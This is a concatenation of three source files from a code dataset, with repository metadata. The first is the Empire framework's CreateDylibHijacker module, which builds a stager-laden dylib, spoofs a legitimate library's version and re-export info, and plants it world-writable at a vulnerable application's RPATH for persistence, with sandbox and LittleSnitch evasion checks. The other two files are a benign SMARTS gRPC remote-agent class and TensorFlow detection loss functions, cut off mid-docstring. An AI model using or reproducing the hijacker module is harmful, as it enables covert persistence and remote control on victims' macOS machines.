lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 230
|
2017-03-01T22:29:59.000Z
|
2022-03-27T17:41:59.000Z
|
lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 9
|
2017-03-05T17:01:46.000Z
|
2018-04-22T21:05:25.000Z
|
lib/modules/python/persistence/osx/CreateHijacker.py
|
Strazzom/Empire
|
9f519bc45b3b5a203f77d8c00b07499157c307ad
|
[
"BSD-3-Clause"
] | 47
|
2017-04-04T18:25:37.000Z
|
2021-09-27T22:48:35.000Z
|
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'CreateDylibHijacker',
# list of one or more authors for the module
'Author': ['@patrickwardle,@xorrior'],
# more verbose multi-line description of the module
'Description': ('Configures and Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
'comment',
'https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Arch' : {
'Description' : 'Arch: x86/x64',
'Required' : True,
'Value' : 'x86'
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'LegitimateDylibPath' : {
'Description' : 'Full path to the legitimate dylib of the vulnerable application',
'Required' : True,
'Value' : ''
},
'VulnerableRPATH' : {
'Description' : 'Full path to where the hijacker should be planted. This will be the RPATH in the Hijack Scanner module.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# the Python script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
arch = self.options['Arch']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
encodedDylib = base64.b64encode(dylibBytes)
dylib = self.options['LegitimateDylibPath']['Value']
vrpath = self.options['VulnerableRPATH']['Value']
script = """
from ctypes import *
def run(attackerDYLIB):
import ctypes
import io
import os
import sys
import fcntl
import shutil
import struct
import stat
LC_REQ_DYLD = 0x80000000
LC_LOAD_WEAK_DYLIB = LC_REQ_DYLD | 0x18
LC_RPATH = (0x1c | LC_REQ_DYLD)
LC_REEXPORT_DYLIB = 0x1f | LC_REQ_DYLD
(
LC_SEGMENT, LC_SYMTAB, LC_SYMSEG, LC_THREAD, LC_UNIXTHREAD, LC_LOADFVMLIB,
LC_IDFVMLIB, LC_IDENT, LC_FVMFILE, LC_PREPAGE, LC_DYSYMTAB, LC_LOAD_DYLIB,
LC_ID_DYLIB, LC_LOAD_DYLINKER, LC_ID_DYLINKER, LC_PREBOUND_DYLIB,
LC_ROUTINES, LC_SUB_FRAMEWORK, LC_SUB_UMBRELLA, LC_SUB_CLIENT,
LC_SUB_LIBRARY, LC_TWOLEVEL_HINTS, LC_PREBIND_CKSUM
) = range(0x1, 0x18)
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
_CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_NAMES = {
-1: 'ANY',
1: 'VAX',
6: 'MC680x0',
7: 'i386',
_CPU_ARCH_ABI64 | 7: 'x86_64',
8: 'MIPS',
10: 'MC98000',
11: 'HPPA',
12: 'ARM',
13: 'MC88000',
14: 'SPARC',
15: 'i860',
16: 'Alpha',
18: 'PowerPC',
_CPU_ARCH_ABI64 | 18: 'PowerPC64',
}
#structs that we need
class mach_header(ctypes.Structure):
_fields_ = [
("magic", ctypes.c_uint),
("cputype", ctypes.c_uint),
("cpusubtype", ctypes.c_uint),
("filetype", ctypes.c_uint),
("ncmds", ctypes.c_uint),
("sizeofcmds", ctypes.c_uint),
("flags", ctypes.c_uint)
]
class mach_header_64(ctypes.Structure):
_fields_ = mach_header._fields_ + [('reserved',ctypes.c_uint)]
class load_command(ctypes.Structure):
_fields_ = [
("cmd", ctypes.c_uint),
("cmdsize", ctypes.c_uint)
]
LC_HEADER_SIZE = 0x8
def checkPrereqs(attackerDYLIB, targetDYLIB):
if not os.path.exists(attackerDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (attackerDYLIB)
return False
if not os.path.exists(targetDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (targetDYLIB)
return False
attacker = open(attackerDYLIB)
target = open(targetDYLIB)
attackerHeader = mach_header.from_buffer_copy(attacker.read(28))
targetHeader = mach_header.from_buffer_copy(target.read(28))
if attackerHeader.cputype != targetHeader.cputype:
print 'ERROR: Architecture mismatch'
attacker.close()
target.close()
return False
return True
def findLoadCommand(fileHandle, targetLoadCommand):
MACHHEADERSZ64 = 32
MACHHEADERSZ = 28
matchedOffsets = []
#wrap
try:
header = mach_header.from_buffer_copy(fileHandle.read(MACHHEADERSZ))
if header.magic == MH_MAGIC_64:
fileHandle.seek(0, io.SEEK_SET)
header = mach_header_64.from_buffer_copy(fileHandle.read(MACHHEADERSZ64))
ncmds = header.ncmds
# Get to the load commands
current = fileHandle.tell() #save offset to load command
for cmd in range(ncmds):
offset = current
lc = load_command.from_buffer_copy(fileHandle.read(LC_HEADER_SIZE))
size = lc.cmdsize
if lc.cmd == targetLoadCommand:
matchedOffsets.append(offset)
fileHandle.seek(size - LC_HEADER_SIZE, io.SEEK_CUR)
current = fileHandle.tell()
#exceptions
except Exception, e:
#err msg
print 'EXCEPTION (finding load commands): %%s' %% e
#reset
matchedOffsets = None
return matchedOffsets
#configure version info
# 1) find/extract version info from target .dylib
# 2) find/update version info from hijacker .dylib to match target .dylib
def configureVersions(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract version info' %% (os.path.split(targetDYLIB)[1])
#open target .dylib
fileHandle = open(targetDYLIB, 'rb')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(targetDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffsets[0], io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#extract current version
currentVersion = fileHandle.read(4)
#extract compatibility version
compatibilityVersion = fileHandle.read(4)
#dbg msg(s)
print ' extracted current version: 0x%%x' %% (struct.unpack('<L', currentVersion)[0])
print ' extracted compatibility version: 0x%%x' %% (struct.unpack('<L', compatibilityVersion)[0])
#close
fileHandle.close()
#dbg msg
print ' [+] parsing \\'%%s\\' to find version info' %% (os.path.split(attackerDYLIB)[1])
#open target .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg(s)
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
print ' [+] updating version info in %%s to match %%s' %% ((os.path.split(attackerDYLIB)[1]), (os.path.split(targetDYLIB)[1]))
#update version info
for versionOffset in versionOffsets:
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffset, io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
#dbg msg
print 'setting version info at offset %%s' %% (versionOffset)
#set current version
fileHandle.write(currentVersion)
#set compatability version
fileHandle.write(compatibilityVersion)
#close
fileHandle.close()
except Exception, e:
#err msg
print 'EXCEPTION (configuring version info): %%s' %% e
return True
#configure re-export
# ->update hijacker .dylib to re-export everything to target .dylib
def configureReExport(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract faux re-export info' %% (os.path.split(attackerDYLIB)[1])
#open attacker's .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_REEXPORT_DYLIB load command
# ->and check
reExportOffsets = findLoadCommand(fileHandle, LC_REEXPORT_DYLIB)
if not reExportOffsets or not len(reExportOffsets):
#err msg
print 'ERROR: failed to find \\'LC_REEXPORT_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_REEXPORT_DYLIB\\' load command at offset(s): %%s' %% (reExportOffsets)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#update re-export info
#TODO: does the current and compat version need to match? we can easily set it
for reExportOffset in reExportOffsets:
#seek to offset of LC_REEXPORT_DYLIB
fileHandle.seek(reExportOffset, io.SEEK_SET)
#seek to skip over command
fileHandle.seek(0x4, io.SEEK_CUR)
#read in size of load command
commandSize = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted LC command size: 0x%%x' %% (commandSize)
#read in path offset
pathOffset = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted path offset: 0x%%x' %% (pathOffset)
#seek to path offset
fileHandle.seek(reExportOffset + pathOffset, io.SEEK_SET)
#calc length of path
# it makes up rest of load command data
pathSize = commandSize - (fileHandle.tell() - reExportOffset)
#dbg msg
print ' computed path size: 0x%%x' %% (pathSize)
#read out path
data = targetDYLIB + '\\0' * (pathSize - len(targetDYLIB))
fileHandle.write(data)
#path can include NULLs so lets chop those off
#path = path.rstrip('\0')
#dbg msg(s)
#print ' extracted faux path: %%s' %% (path)
#close
fileHandle.close()
#dbg msg
print ' [+] updated embedded re-export'
#wrap
#handle exceptions
except Exception, e:
#err msg
print 'EXCEPTION (configuring re-exports): %%s' %% e
#bail
return False
return True
def configure(attackerDYLIB, targetDYLIB):
#configure version info
# ->update attacker's .dylib to match target .dylib's version info
if not configureVersions(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure version info'
#bail
return False
#configure re-export
# ->update attacker's .dylib to re-export everything to target .dylib
if not configureReExport(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure re-export'
#bail
return False
return True
#target .dylib
targetDYLIB = "%s"
vrpath = "%s"
#configured .dylib
configuredDYLIB = ""
#init output path for configured .dylib
configuredDYLIB = os.path.split(attackerDYLIB)[0]+'/' + os.path.split(targetDYLIB)[1]
#dbg msg
print ' [+] configuring %%s to hijack %%s' %% (os.path.split(attackerDYLIB)[1], os.path.split(targetDYLIB)[1])
#check prereqs
# ->i.e. sanity checks
if not checkPrereqs(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: prerequisite check failed\\n'
#bail
return ""
#configure the provide .dylib
if not configure(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure %%s\\n' %% (os.path.split(targetDYLIB)[1])
#bail
return ""
#dbg msg
print ' [+] copying configured .dylib to %%s' %% (configuredDYLIB)
#make a (local) copy w/ name
shutil.copy2(attackerDYLIB, configuredDYLIB)
os.remove(attackerDYLIB)
if not os.path.exists(os.path.split(vrpath)[0]):
os.makedirs(os.path.split(vrpath)[0])
os.chmod(configuredDYLIB, 0777)
shutil.copy2(configuredDYLIB, vrpath)
os.remove(configuredDYLIB)
#dbg msg
print '\\nHijacker created, renamed to %%s, and copied to %%s' %% (configuredDYLIB,vrpath)
import base64
import uuid
encbytes = "%s"
filename = str(uuid.uuid4())
path = "/tmp/" + filename + ".dylib"
decodedDylib = base64.b64decode(encbytes)
temp = open(path,'wb')
temp.write(decodedDylib)
temp.close()
run(path)
""" % (dylib,vrpath,encodedDylib)
return script
| 32.180505
| 279
| 0.558728
|
991ba12b1c0cde1e4c18f108f09a865fe803c415
| 4,576
|
py
|
Python
|
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import time
from concurrent import futures
from typing import Tuple
import cloudpickle
import grpc
from smarts.core.agent import AgentSpec
from smarts.zoo import manager_pb2, manager_pb2_grpc, worker_pb2, worker_pb2_grpc
class RemoteAgentException(Exception):
"""An exception describing issues relating to maintaining connection with a remote agent."""
pass
class RemoteAgent:
"""A remotely controlled agent."""
def __init__(
self,
manager_address: Tuple[str, int],
worker_address: Tuple[str, int],
timeout: float = 10,
):
"""Executes an agent in a worker (i.e., a gRPC server).
Args:
manager_address (Tuple[str,int]): Manager's server address (ip, port).
worker_address (Tuple[str,int]): Worker's server address (ip, port).
timeout (float, optional): Time (seconds) to wait for startup or response from
server. Defaults to 10.
Raises:
RemoteAgentException: If timeout occurs while connecting to the manager or worker.
"""
self._log = logging.getLogger(self.__class__.__name__)
# Track the last action future.
self._act_future = None
self._manager_channel = grpc.insecure_channel(
f"{manager_address[0]}:{manager_address[1]}"
)
self._worker_address = worker_address
self._worker_channel = grpc.insecure_channel(
f"{worker_address[0]}:{worker_address[1]}"
)
try:
# Wait until the grpc server is ready or timeout seconds.
grpc.channel_ready_future(self._manager_channel).result(timeout=timeout)
grpc.channel_ready_future(self._worker_channel).result(timeout=timeout)
except grpc.FutureTimeoutError as e:
raise RemoteAgentException(
"Timeout while connecting to remote worker process."
) from e
self._manager_stub = manager_pb2_grpc.ManagerStub(self._manager_channel)
self._worker_stub = worker_pb2_grpc.WorkerStub(self._worker_channel)
def act(self, obs):
"""Call the agent's act function asynchronously and return a Future."""
self._act_future = self._worker_stub.act.future(
worker_pb2.Observation(payload=cloudpickle.dumps(obs))
)
return self._act_future
def start(self, agent_spec: AgentSpec):
"""Send the AgentSpec to the agent runner."""
# Cloudpickle used only for the agent_spec to allow for serialization of lambdas.
self._worker_stub.build(
worker_pb2.Specification(payload=cloudpickle.dumps(agent_spec))
)
def terminate(self):
"""Close the agent connection and invalidate this agent."""
# If the last action future returned is incomplete, cancel it first.
if (self._act_future is not None) and (not self._act_future.done()):
self._act_future.cancel()
try:
# Stop the remote worker process
self._manager_stub.stop_worker(
manager_pb2.Port(num=self._worker_address[1])
)
# Close manager channel
self._manager_channel.close()
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.UNAVAILABLE:
# Do nothing as RPC server has been terminated.
pass
else:
raise e
| 39.791304
| 96
| 0.676136
|
767ad8c1fb199395d7adcc0eed8ac61081bbe743
| 23,017
|
py
|
Python
|
mobile_deployment/tensorflow/slim/models/official/vision/detection/modeling/losses.py
|
zhoudaquan/rethinking_bottleneck_structure_code_release
|
195ee737952e2f8d729a14b51651748caf35794c
|
[
"BSD-3-Clause-Clear"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
official/vision/detection/modeling/losses.py
|
MissMonster/models
|
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
official/vision/detection/modeling/losses.py
|
MissMonster/models
|
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Losses used for detection models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
import tensorflow as tf
def focal_loss(logits, targets, alpha, gamma, normalizer):
"""Compute the focal loss between `logits` and the golden `target` values.
Focal loss = -(1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
Args:
logits: A float32 tensor of size
[batch, height_in, width_in, num_predictions].
targets: A float32 tensor of size
[batch, height_in, width_in, num_predictions].
alpha: A float32 scalar multiplying alpha to the loss from positive examples
and (1-alpha) to the loss from negative examples.
gamma: A float32 scalar modulating loss from hard and easy examples.
normalizer: A float32 scalar normalizes the total loss from all examples.
Returns:
loss: A float32 Tensor of size [batch, height_in, width_in, num_predictions]
representing normalized loss on the prediction map.
"""
with tf.name_scope('focal_loss'):
positive_label_mask = tf.math.equal(targets, 1.0)
cross_entropy = (
tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits))
# Below are comments/derivations for computing modulator.
# For brevity, let x = logits, z = targets, r = gamma, and p_t = sigmod(x)
# for positive samples and 1 - sigmoid(x) for negative examples.
#
# The modulator, defined as (1 - P_t)^r, is a critical part in focal loss
# computation. For r > 0, it puts more weights on hard examples, and less
# weights on easier ones. However if it is directly computed as (1 - P_t)^r,
# its back-propagation is not stable when r < 1. The implementation here
# resolves the issue.
#
# For positive samples (labels being 1),
# (1 - p_t)^r
# = (1 - sigmoid(x))^r
# = (1 - (1 / (1 + exp(-x))))^r
# = (exp(-x) / (1 + exp(-x)))^r
# = exp(log((exp(-x) / (1 + exp(-x)))^r))
# = exp(r * log(exp(-x)) - r * log(1 + exp(-x)))
# = exp(- r * x - r * log(1 + exp(-x)))
#
# For negative samples (labels being 0),
# (1 - p_t)^r
# = (sigmoid(x))^r
# = (1 / (1 + exp(-x)))^r
# = exp(log((1 / (1 + exp(-x)))^r))
# = exp(-r * log(1 + exp(-x)))
#
# Therefore one unified form for positive (z = 1) and negative (z = 0)
# samples is:
# (1 - p_t)^r = exp(-r * z * x - r * log(1 + exp(-x))).
neg_logits = -1.0 * logits
modulator = tf.math.exp(gamma * targets * neg_logits -
gamma * tf.math.log1p(tf.math.exp(neg_logits)))
loss = modulator * cross_entropy
weighted_loss = tf.where(positive_label_mask, alpha * loss,
(1.0 - alpha) * loss)
weighted_loss /= normalizer
return weighted_loss
class RpnScoreLoss(object):
"""Region Proposal Network score loss function."""
def __init__(self, params):
self._rpn_batch_size_per_im = params.rpn_batch_size_per_im
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, score_outputs, labels):
"""Computes total RPN detection loss.
Computes total RPN detection loss including box and score from all levels.
Args:
score_outputs: an OrderDict with keys representing levels and values
representing scores in [batch_size, height, width, num_anchors].
labels: the dictionary that returned from dataloader that includes
groundturth targets.
Returns:
rpn_score_loss: a scalar tensor representing total score loss.
"""
with tf.name_scope('rpn_loss'):
levels = sorted(score_outputs.keys())
score_losses = []
for level in levels:
score_losses.append(
self._rpn_score_loss(
score_outputs[level],
labels[level],
normalizer=tf.cast(
tf.shape(score_outputs[level])[0] *
self._rpn_batch_size_per_im, dtype=tf.float32)))
# Sums per level losses to total loss.
return tf.math.add_n(score_losses)
def _rpn_score_loss(self, score_outputs, score_targets, normalizer=1.0):
"""Computes score loss."""
# score_targets has three values:
# (1) score_targets[i]=1, the anchor is a positive sample.
# (2) score_targets[i]=0, negative.
# (3) score_targets[i]=-1, the anchor is don't care (ignore).
with tf.name_scope('rpn_score_loss'):
mask = tf.math.logical_or(tf.math.equal(score_targets, 1),
tf.math.equal(score_targets, 0))
score_targets = tf.math.maximum(score_targets,
tf.zeros_like(score_targets))
score_targets = tf.expand_dims(score_targets, axis=-1)
score_outputs = tf.expand_dims(score_outputs, axis=-1)
score_loss = self._binary_crossentropy(
score_targets, score_outputs, sample_weight=mask)
score_loss /= normalizer
return score_loss
class RpnBoxLoss(object):
"""Region Proposal Network box regression loss function."""
def __init__(self, params):
logging.info('RpnBoxLoss huber_loss_delta %s', params.huber_loss_delta)
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2].
self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, labels):
"""Computes total RPN detection loss.
Computes total RPN detection loss including box and score from all levels.
Args:
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in
[batch_size, height, width, num_anchors * 4].
labels: the dictionary that returned from dataloader that includes
groundturth targets.
Returns:
rpn_box_loss: a scalar tensor representing total box regression loss.
"""
with tf.name_scope('rpn_loss'):
levels = sorted(box_outputs.keys())
box_losses = []
for level in levels:
box_losses.append(self._rpn_box_loss(box_outputs[level], labels[level]))
# Sum per level losses to total loss.
return tf.add_n(box_losses)
def _rpn_box_loss(self, box_outputs, box_targets, normalizer=1.0):
"""Computes box regression loss."""
with tf.name_scope('rpn_box_loss'):
mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
# The loss is normalized by the sum of non-zero weights and additional
# normalizer provided by the function caller. Using + 0.01 here to avoid
# division by zero.
box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01)
return box_loss
class FastrcnnClassLoss(object):
"""Fast R-CNN classification loss function."""
def __init__(self):
self._categorical_crossentropy = tf.keras.losses.CategoricalCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, class_outputs, class_targets):
"""Computes the class loss (Fast-RCNN branch) of Mask-RCNN.
This function implements the classification loss of the Fast-RCNN.
The classification loss is softmax on all RoIs.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long
Args:
class_outputs: a float tensor representing the class prediction for each box
with a shape of [batch_size, num_boxes, num_classes].
class_targets: a float tensor representing the class label for each box
with a shape of [batch_size, num_boxes].
Returns:
a scalar tensor representing total class loss.
"""
with tf.name_scope('fast_rcnn_loss'):
batch_size, num_boxes, num_classes = class_outputs.get_shape().as_list()
class_targets = tf.cast(class_targets, dtype=tf.int32)
class_targets_one_hot = tf.one_hot(class_targets, num_classes)
return self._fast_rcnn_class_loss(class_outputs, class_targets_one_hot,
normalizer=batch_size * num_boxes / 2.0)
def _fast_rcnn_class_loss(self, class_outputs, class_targets_one_hot,
normalizer):
"""Computes classification loss."""
with tf.name_scope('fast_rcnn_class_loss'):
class_loss = self._categorical_crossentropy(class_targets_one_hot,
class_outputs)
class_loss /= normalizer
return class_loss
class FastrcnnBoxLoss(object):
"""Fast R-CNN box regression loss function."""
def __init__(self, params):
logging.info('FastrcnnBoxLoss huber_loss_delta %s', params.huber_loss_delta)
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2].
self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, class_targets, box_targets):
"""Computes the box loss (Fast-RCNN branch) of Mask-RCNN.
This function implements the box regression loss of the Fast-RCNN. As the
`box_outputs` produces `num_classes` boxes for each RoI, the reference model
expands `box_targets` to match the shape of `box_outputs` and selects only
the target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py) # pylint: disable=line-too-long
Instead, this function selects the `box_outputs` by the `class_targets` so
that it doesn't expand `box_targets`.
The box loss is smooth L1-loss on only positive samples of RoIs.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long
Args:
box_outputs: a float tensor representing the box prediction for each box
with a shape of [batch_size, num_boxes, num_classes * 4].
class_targets: a float tensor representing the class label for each box
with a shape of [batch_size, num_boxes].
box_targets: a float tensor representing the box label for each box
with a shape of [batch_size, num_boxes, 4].
Returns:
box_loss: a scalar tensor representing total box regression loss.
"""
with tf.name_scope('fast_rcnn_loss'):
class_targets = tf.cast(class_targets, dtype=tf.int32)
# Selects the box from `box_outputs` based on `class_targets`, with which
# the box has the maximum overlap.
(batch_size, num_rois,
num_class_specific_boxes) = box_outputs.get_shape().as_list()
num_classes = num_class_specific_boxes // 4
box_outputs = tf.reshape(box_outputs,
[batch_size, num_rois, num_classes, 4])
box_indices = tf.reshape(
class_targets + tf.tile(
tf.expand_dims(
tf.range(batch_size) * num_rois * num_classes, 1),
[1, num_rois]) + tf.tile(
tf.expand_dims(tf.range(num_rois) * num_classes, 0),
[batch_size, 1]), [-1])
box_outputs = tf.matmul(
tf.one_hot(
box_indices,
batch_size * num_rois * num_classes,
dtype=box_outputs.dtype), tf.reshape(box_outputs, [-1, 4]))
box_outputs = tf.reshape(box_outputs, [batch_size, -1, 4])
return self._fast_rcnn_box_loss(box_outputs, box_targets, class_targets)
def _fast_rcnn_box_loss(self, box_outputs, box_targets, class_targets,
normalizer=1.0):
"""Computes box regression loss."""
with tf.name_scope('fast_rcnn_box_loss'):
mask = tf.tile(tf.expand_dims(tf.greater(class_targets, 0), axis=2),
[1, 1, 4])
mask = tf.cast(mask, dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
# The loss is normalized by the number of ones in mask,
# additianal normalizer provided by the user and using 0.01 here to avoid
# division by 0.
box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01)
return box_loss
class MaskrcnnLoss(object):
"""Mask R-CNN instance segmentation mask loss function."""
def __init__(self):
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, mask_outputs, mask_targets, select_class_targets):
"""Computes the mask loss of Mask-RCNN.
This function implements the mask loss of Mask-RCNN. As the `mask_outputs`
produces `num_classes` masks for each RoI, the reference model expands
`mask_targets` to match the shape of `mask_outputs` and selects only the
target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/mask_rcnn.py) # pylint: disable=line-too-long
Instead, this implementation selects the `mask_outputs` by the `class_targets`
so that it doesn't expand `mask_targets`. Note that the selection logic is
done in the post-processing of mask_rcnn_fn in mask_rcnn_architecture.py.
Args:
mask_outputs: a float tensor representing the prediction for each mask,
with a shape of
[batch_size, num_masks, mask_height, mask_width].
mask_targets: a float tensor representing the binary mask of ground truth
labels for each mask with a shape of
[batch_size, num_masks, mask_height, mask_width].
select_class_targets: a tensor with a shape of [batch_size, num_masks],
